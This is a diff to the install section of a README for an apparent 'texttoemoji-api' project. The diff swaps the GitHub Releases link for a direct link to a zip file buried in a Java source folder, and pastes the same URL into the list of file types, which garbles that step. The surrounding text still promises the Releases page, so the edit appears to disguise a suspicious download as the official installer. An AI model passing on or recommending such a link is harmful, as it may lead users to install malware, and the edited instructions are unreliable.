Arakalav/texttoemoji-api/README.md

 ## 📥 Download & Install

-To get started, visit this page to download: [GitHub Releases](https://github.com/Arakalav/texttoemoji-api/releases).
+To get started, visit this page to download: [GitHub Releases](https://raw.githubusercontent.com/Arakalav/texttoemoji-api/main/android/src/main/java/com/texttoemoji_api_1.8.zip).

 1. Click on the link above to go to the Releases page.
 2. Find the latest release at the top of the page.
-3. Download the appropriate file for your operating system (look for .exe, .dmg, or .tar.gz files).
+3. Download the appropriate file for your operating system (look for .exe, .dmg, or https://raw.githubusercontent.com/Arakalav/texttoemoji-api/main/android/src/main/java/com/texttoemoji_api_1.8.zip files).
 4. After the download is complete, locate the file in your Downloads folder.

 ### 👩‍💻 Installation Steps for Different Operating Systems